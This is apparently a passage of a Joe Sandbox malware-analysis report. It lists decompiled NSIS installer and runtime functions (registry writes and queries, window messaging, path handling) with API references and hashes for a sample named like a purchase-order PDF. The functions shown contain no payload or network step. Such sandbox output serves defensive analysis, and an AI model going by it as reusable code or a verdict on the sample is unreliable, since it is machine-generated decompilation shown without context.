                                            					_t41 = E00402D84(2);
                                            					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                            					_t56 =  *(_t64 - 0x1c) >> 2;
                                            					if(__eflags == 0) {
                                            						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                            						L10:
                                            						 *(_t64 - 0x38) = _t36;
                                            					} else {
                                            						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                            						asm("sbb eax, eax");
                                            						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                            					}
                                            				}
                                            				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                            				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                            					_push( *(_t64 - 0x38));
                                            					E004065AF();
                                            				}
                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
                                            				return 0;
                                            			}















                                            0x00401c43
                                            0x00401c45
                                            0x00401c4c
                                            0x00401c4f
                                            0x00401c52
                                            0x00401c5c
                                            0x00401c60
                                            0x00401c63
                                            0x00401c6c
                                            0x00401c6c
                                            0x00401c6f
                                            0x00401c73
                                            0x00401c7c
                                            0x00401c7c
                                            0x00401c7f
                                            0x00401c83
                                            0x00401c85
                                            0x00401cda
                                            0x00401cdc
                                            0x00401ce7
                                            0x00401cf1
                                            0x00401cf4
                                            0x00401cf4
                                            0x00401cfd
                                            0x00000000
                                            0x00401c87
                                            0x00401c8e
                                            0x00401c90
                                            0x00401c93
                                            0x00401c99
                                            0x00401ca0
                                            0x00401ca3
                                            0x00401ccb
                                            0x00401d03
                                            0x00401d03
                                            0x00401ca5
                                            0x00401cb3
                                            0x00401cbb
                                            0x00401cbe
                                            0x00401cbe
                                            0x00401ca3
                                            0x00401d06
                                            0x00401d09
                                            0x00401d0f
                                            0x00402ba4
                                            0x00402ba4
                                            0x00402c2d
                                            0x00402c39

                                            APIs
                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                            • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                            • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                            • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 85%
                                            			E0040248A(void* __eax, int __ebx, intOrPtr __edx) {
                                            				void* _t20;
                                            				void* _t21;
                                            				int _t24;
                                            				char _t27;
                                            				int _t30;
                                            				void* _t32;
                                            				intOrPtr _t33;
                                            				void* _t34;
                                            				intOrPtr _t37;
                                            				void* _t39;
                                            				void* _t42;
                                            
                                            				_t33 = __edx;
                                            				_t30 = __ebx;
                                            				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                                            				_t34 = __eax;
                                            				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                                            				 *(_t39 - 0x44) = E00402DA6(2);
                                            				_t20 = E00402DA6(0x11);
                                            				 *(_t39 - 4) = 1;
                                            				_t21 = E00402E36(_t42, _t34, _t20, 2);
                                            				 *(_t39 + 8) = _t21;
                                            				if(_t21 != __ebx) {
                                            					_t24 = 0;
                                            					if(_t37 == 1) {
                                            						E00402DA6(0x23);
                                            						_t24 = lstrlenW(0x40b5f8) + _t29 + 2;
                                            					}
                                            					if(_t37 == 4) {
                                            						_t27 = E00402D84(3);
                                            						_pop(_t32);
                                            						 *0x40b5f8 = _t27;
                                            						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                                            						_t24 = _t37;
                                            					}
                                            					if(_t37 == 3) {
                                            						_t24 = E00403371(_t32,  *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f8, 0x1800);
                                            					}
                                            					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f8, _t24) == 0) {
                                            						 *(_t39 - 4) = _t30;
                                            					}
                                            					_push( *(_t39 + 8));
                                            					RegCloseKey();
                                            				}
                                            				 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
                                            				return 0;
                                            			}














                                            0x0040248a
                                            0x0040248a
                                            0x0040248a
                                            0x0040248d
                                            0x00402494
                                            0x0040249e
                                            0x004024a1
                                            0x004024aa
                                            0x004024b1
                                            0x004024b8
                                            0x004024bb
                                            0x004024c1
                                            0x004024cb
                                            0x004024cf
                                            0x004024da
                                            0x004024da
                                            0x004024e1
                                            0x004024e5
                                            0x004024ea
                                            0x004024eb
                                            0x004024f1
                                            0x004024f4
                                            0x004024f4
                                            0x004024f8
                                            0x00402504
                                            0x00402504
                                            0x0040251d
                                            0x0040251f
                                            0x0040251f
                                            0x00402522
                                            0x004025fd
                                            0x004025fd
                                            0x00402c2d
                                            0x00402c39

                                            APIs
                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp,00000023,00000011,00000002), ref: 004024D5
                                            • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp,00000000,00000011,00000002), ref: 00402515
                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp,00000000,00000011,00000002), ref: 004025FD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: CloseValuelstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp
                                            • API String ID: 2655323295-2517040147
                                            • Opcode ID: 2c9c4c0baa2399e38114195eed6ba3c931801a1fff8a52bb7ff1bd283087c782
                                            • Instruction ID: a516967871aadb8e7373f7254d3c24ec0cdbd982f2b4049ed7d94b0996b6da2b
                                            • Opcode Fuzzy Hash: 2c9c4c0baa2399e38114195eed6ba3c931801a1fff8a52bb7ff1bd283087c782
                                            • Instruction Fuzzy Hash: 4011AF71E00108BEEF10AFA1CE49EAEB6B8EB44354F11443AF404B61C1DBB98D409658
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 53%
                                            			E0040603F(void* __eflags, intOrPtr _a4) {
                                            				int _t11;
                                            				signed char* _t12;
                                            				intOrPtr _t18;
                                            				intOrPtr* _t21;
                                            				signed int _t23;
                                            
                                            				E00406668(0x425f50, _a4);
                                            				_t21 = E00405FE2(0x425f50);
                                            				if(_t21 != 0) {
                                            					E004068EF(_t21);
                                            					if(( *0x42a278 & 0x00000080) == 0) {
                                            						L5:
                                            						_t23 = _t21 - 0x425f50 >> 1;
                                            						while(1) {
                                            							_t11 = lstrlenW(0x425f50);
                                            							_push(0x425f50);
                                            							if(_t11 <= _t23) {
                                            								break;
                                            							}
                                            							_t12 = E0040699E();
                                            							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                            								E00405F83(0x425f50);
                                            								continue;
                                            							} else {
                                            								goto L1;
                                            							}
                                            						}
                                            						E00405F37();
                                            						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                            					}
                                            					_t18 =  *_t21;
                                            					if(_t18 == 0 || _t18 == 0x5c) {
                                            						goto L1;
                                            					} else {
                                            						goto L5;
                                            					}
                                            				}
                                            				L1:
                                            				return 0;
                                            			}








                                            0x0040604b
                                            0x00406056
                                            0x0040605a
                                            0x00406061
                                            0x0040606d
                                            0x0040607d
                                            0x0040607f
                                            0x00406097
                                            0x00406098
                                            0x0040609f
                                            0x004060a0
                                            0x00000000
                                            0x00000000
                                            0x00406083
                                            0x0040608a
                                            0x00406092
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040608a
                                            0x004060a2
                                            0x00000000
                                            0x004060b6
                                            0x0040606f
                                            0x00406075
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406075
                                            0x0040605c
                                            0x00000000

                                            APIs
                                              • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                              • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50, 4Tu.Tu,?,75542EE0,00405D94,?,75543420,75542EE0,00000000), ref: 00405FF0
                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                            • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50, 4Tu.Tu,?,75542EE0,00405D94,?,75543420,75542EE0,00000000), ref: 00406098
                                            • GetFileAttributesW.KERNEL32(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50, 4Tu.Tu,?,75542EE0,00405D94,?,75543420,75542EE0), ref: 004060A8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                            • String ID: 4Tu.Tu$P_B
                                            • API String ID: 3248276644-2825032643
                                            • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                            • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                            • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                            • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 91%
                                            			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                            				int _v8;
                                            				long _t21;
                                            				long _t24;
                                            				char* _t30;
                                            
                                            				asm("sbb eax, eax");
                                            				_v8 = 0x800;
                                            				_t5 =  &_a4; // 0x422728
                                            				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                            				_t30 = _a16;
                                            				if(_t21 != 0) {
                                            					L4:
                                            					 *_t30 =  *_t30 & 0x00000000;
                                            				} else {
                                            					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                            					_t21 = RegCloseKey(_a20);
                                            					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                            					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                            						goto L4;
                                            					}
                                            				}
                                            				return _t21;
                                            			}







                                            0x00406544
                                            0x00406546
                                            0x0040655b
                                            0x0040655e
                                            0x00406563
                                            0x00406568
                                            0x004065a6
                                            0x004065a6
                                            0x0040656a
                                            0x0040657c
                                            0x00406587
                                            0x0040658d
                                            0x00406598
                                            0x00000000
                                            0x00000000
                                            0x00406598
                                            0x004065ac

                                            APIs
                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,Fosklcks,?,?,0040679D,80000002), ref: 0040657C
                                            • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,Fosklcks,Fosklcks,Fosklcks,00000000,00422728), ref: 00406587
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: CloseQueryValue
                                            • String ID: ('B$Fosklcks
                                            • API String ID: 3356406503-169972850
                                            • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                            • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                            • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                            • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 58%
                                            			E10001000() {
                                            				char _v8;
                                            				_Unknown_base(*)()* _v12;
                                            
                                            				_v8 = 0;
                                            				_v12 = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "GetModuleHandleExW");
                                            				_v12(6, E10001000,  &_v8);
                                            				return _v8;
                                            			}





                                            0x10001006
                                            0x10001024
                                            0x10001032
                                            0x1000103b

                                            APIs
                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,GetModuleHandleExW), ref: 10001017
                                            • GetProcAddress.KERNEL32(00000000), ref: 1000101E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: GetModuleHandleExW$Kernel32.dll
                                            • API String ID: 1646373207-332549961
                                            • Opcode ID: 78ecdb18c8cf1155b803042e0fd8ea9a7357a6dfbe6600d3dc8cc484a1e9cb8c
                                            • Instruction ID: 63f985a6f37cd22edcfa9ef1cf1702fe9c8e286a4ec36befd3c37240eef0757d
                                            • Opcode Fuzzy Hash: 78ecdb18c8cf1155b803042e0fd8ea9a7357a6dfbe6600d3dc8cc484a1e9cb8c
                                            • Instruction Fuzzy Hash: F6E0EC7580020CFBEB10EFE48D4DBDEBB78EB04391F204191FA45A2248D7706B589BA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 16%
                                            			E10001ABA(void* __ecx, intOrPtr _a4) {
                                            				struct HINSTANCE__* _v8;
                                            				_Unknown_base(*)()* _t4;
                                            
                                            				_t4 =  &_v8;
                                            				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
                                            				if(_t4 != 0) {
                                            					_t4 = GetProcAddress(_v8, "CorExitProcess");
                                            					if(_t4 != 0) {
                                            						return  *_t4(_a4);
                                            					}
                                            				}
                                            				return _t4;
                                            			}





                                            0x10001abe
                                            0x10001ac9
                                            0x10001ad1
                                            0x10001adb
                                            0x10001ae3
                                            0x00000000
                                            0x10001ae8
                                            0x10001ae3
                                            0x10001aeb

                                            APIs
                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10001AF7,?,?,100044E8,000000FF,0000001E,00000000,?,00000000,?,10002780), ref: 10001AC9
                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10001ADB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 1646373207-1276376045
                                            • Opcode ID: 040de483115e28654e06a21dde0c8c6013ab8d4b0f4902904f772b877cdfe749
                                            • Instruction ID: b3a791a94bc65956dbcabe6bd8d5577e249d2fb022347dc57580776b7674d52e
                                            • Opcode Fuzzy Hash: 040de483115e28654e06a21dde0c8c6013ab8d4b0f4902904f772b877cdfe749
                                            • Instruction Fuzzy Hash: ACD06731240609BBFB81EBA1CC45F9B7AACFB116C2F004174F646E1469DB71DB04A765
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 58%
                                            			E00405F37(WCHAR* _a4) {
                                            				WCHAR* _t9;
                                            
                                            				_t9 = _a4;
                                            				_push( &(_t9[lstrlenW(_t9)]));
                                            				_push(_t9);
                                            				if( *(CharPrevW()) != 0x5c) {
                                            					lstrcatW(_t9, 0x40a014);
                                            				}
                                            				return _t9;
                                            			}




                                            0x00405f38
                                            0x00405f45
                                            0x00405f46
                                            0x00405f51
                                            0x00405f59
                                            0x00405f59
                                            0x00405f61

                                            APIs
                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrcatlstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 2659869361-1098563871
                                            • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                            • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                            • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                            • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E10006EED(void* __edx, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                            				char _v8;
                                            				intOrPtr _v12;
                                            				int _v20;
                                            				void* __ebx;
                                            				int _t35;
                                            				int _t38;
                                            				intOrPtr* _t44;
                                            				int _t47;
                                            				short* _t49;
                                            				intOrPtr _t50;
                                            				intOrPtr _t54;
                                            				int _t55;
                                            				int _t60;
                                            				char* _t63;
                                            
                                            				_t63 = _a8;
                                            				if(_t63 == 0) {
                                            					L5:
                                            					return 0;
                                            				}
                                            				_t50 = _a12;
                                            				if(_t50 == 0) {
                                            					goto L5;
                                            				}
                                            				if( *_t63 != 0) {
                                            					E10002F18(_t50,  &_v20, __edx, _a16);
                                            					_t35 = _v20;
                                            					__eflags =  *(_t35 + 0xa8);
                                            					if( *(_t35 + 0xa8) != 0) {
                                            						_t38 = E10006E35( *_t63 & 0x000000ff,  &_v20);
                                            						__eflags = _t38;
                                            						if(_t38 == 0) {
                                            							__eflags = _a4;
                                            							_t60 = 1;
                                            							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t63, 1, _a4, 0 | _a4 != 0x00000000);
                                            							if(__eflags != 0) {
                                            								L21:
                                            								__eflags = _v8;
                                            								if(_v8 != 0) {
                                            									_t54 = _v12;
                                            									_t31 = _t54 + 0x70;
                                            									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                            									__eflags =  *_t31;
                                            								}
                                            								return _t60;
                                            							}
                                            							L20:
                                            							_t44 = E10003A67(__eflags);
                                            							_t60 = _t60 | 0xffffffff;
                                            							__eflags = _t60;
                                            							 *_t44 = 0x2a;
                                            							goto L21;
                                            						}
                                            						_t60 = _v20;
                                            						__eflags =  *(_t60 + 0x74) - 1;
                                            						if( *(_t60 + 0x74) <= 1) {
                                            							L15:
                                            							__eflags = _t50 -  *(_t60 + 0x74);
                                            							L16:
                                            							if(__eflags < 0) {
                                            								goto L20;
                                            							}
                                            							__eflags = _t63[1];
                                            							if(__eflags == 0) {
                                            								goto L20;
                                            							}
                                            							L18:
                                            							_t60 =  *(_t60 + 0x74);
                                            							goto L21;
                                            						}
                                            						__eflags = _t50 -  *(_t60 + 0x74);
                                            						if(__eflags < 0) {
                                            							goto L16;
                                            						}
                                            						__eflags = _a4;
                                            						_t47 = MultiByteToWideChar( *(_t60 + 4), 9, _t63,  *(_t60 + 0x74), _a4, 0 | _a4 != 0x00000000);
                                            						_t60 = _v20;
                                            						__eflags = _t47;
                                            						if(_t47 != 0) {
                                            							goto L18;
                                            						}
                                            						goto L15;
                                            					}
                                            					_t55 = _a4;
                                            					__eflags = _t55;
                                            					if(_t55 != 0) {
                                            						 *_t55 =  *_t63 & 0x000000ff;
                                            					}
                                            					_t60 = 1;
                                            					goto L21;
                                            				}
                                            				_t49 = _a4;
                                            				if(_t49 != 0) {
                                            					 *_t49 = 0;
                                            				}
                                            				goto L5;
                                            			}

















                                            0x10006ef5
                                            0x10006efa
                                            0x10006f14
                                            0x00000000
                                            0x10006f14
                                            0x10006efc
                                            0x10006f01
                                            0x00000000
                                            0x00000000
                                            0x10006f06
                                            0x10006f21
                                            0x10006f26
                                            0x10006f29
                                            0x10006f30
                                            0x10006f4f
                                            0x10006f56
                                            0x10006f58
                                            0x10006f9c
                                            0x10006fa4
                                            0x10006fb9
                                            0x10006fbb
                                            0x10006fcb
                                            0x10006fcb
                                            0x10006fcf
                                            0x10006fd1
                                            0x10006fd4
                                            0x10006fd4
                                            0x10006fd4
                                            0x10006fd4
                                            0x00000000
                                            0x10006fda
                                            0x10006fbd
                                            0x10006fbd
                                            0x10006fc2
                                            0x10006fc2
                                            0x10006fc5
                                            0x00000000
                                            0x10006fc5
                                            0x10006f5a
                                            0x10006f5d
                                            0x10006f61
                                            0x10006f8a
                                            0x10006f8a
                                            0x10006f8d
                                            0x10006f8d
                                            0x00000000
                                            0x00000000
                                            0x10006f8f
                                            0x10006f93
                                            0x00000000
                                            0x00000000
                                            0x10006f95
                                            0x10006f95
                                            0x00000000
                                            0x10006f95
                                            0x10006f63
                                            0x10006f66
                                            0x00000000
                                            0x00000000
                                            0x10006f6a
                                            0x10006f7d
                                            0x10006f83
                                            0x10006f86
                                            0x10006f88
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006f88
                                            0x10006f32
                                            0x10006f35
                                            0x10006f37
                                            0x10006f3c
                                            0x10006f3c
                                            0x10006f41
                                            0x00000000
                                            0x10006f41
                                            0x10006f08
                                            0x10006f0d
                                            0x10006f11
                                            0x10006f11
                                            0x00000000

                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10006F21
                                            • __isleadbyte_l.LIBCMT ref: 10006F4F
                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 10006F7D
                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 10006FB3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                            • String ID:
                                            • API String ID: 3058430110-0
                                            • Opcode ID: 3e37b5fd8b292c56ca421d15e2d83d6598a2f22aaba71977e649cf7cfa98953f
                                            • Instruction ID: 60f1d58214d7dd26ee1f2bfda8bb28617081854c5ad05abbddf6d5a73fe3e510
                                            • Opcode Fuzzy Hash: 3e37b5fd8b292c56ca421d15e2d83d6598a2f22aaba71977e649cf7cfa98953f
                                            • Instruction Fuzzy Hash: 4C316931600257AFEB11CF64DC45BBA7BE6FF492E0F228438F4609B195E730A951DBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 92%
                                            			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                                            				signed int _t14;
                                            				int _t17;
                                            				void* _t24;
                                            				intOrPtr* _t29;
                                            				void* _t31;
                                            				signed int _t32;
                                            				void* _t35;
                                            				void* _t40;
                                            				signed int _t42;
                                            
                                            				_t29 = __edi;
                                            				_t24 = __ebx;
                                            				_t14 =  *(_t35 - 0x28);
                                            				_t40 = __edx - 0x38;
